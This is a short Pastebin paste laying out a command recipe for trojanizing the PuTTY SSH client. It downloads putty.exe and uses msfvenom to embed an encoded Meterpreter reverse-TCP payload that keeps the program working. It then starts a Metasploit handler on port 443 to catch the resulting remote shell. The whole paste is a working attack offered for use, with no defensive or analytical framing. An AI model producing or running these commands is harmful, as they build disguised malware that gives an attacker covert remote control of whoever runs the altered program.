Advertisement
GR1Mr3ap3r

Untitled

Feb 16th, 2017
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.52 KB | None | 0 0
  1. wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  2.  
  3. msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=your linux ip -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe
  4.  
  5. msf > use exploit/multi/handler
  6. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  7. PAYLOAD => windows/meterpreter/reverse_tcp
  8. msf exploit(handler) > set LHOST 192.168.1.101
  9. LHOST => your linux ip
  10. msf exploit(handler) > set LPORT 443
  11. LPORT => 443
  12. msf exploit(handler) > exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement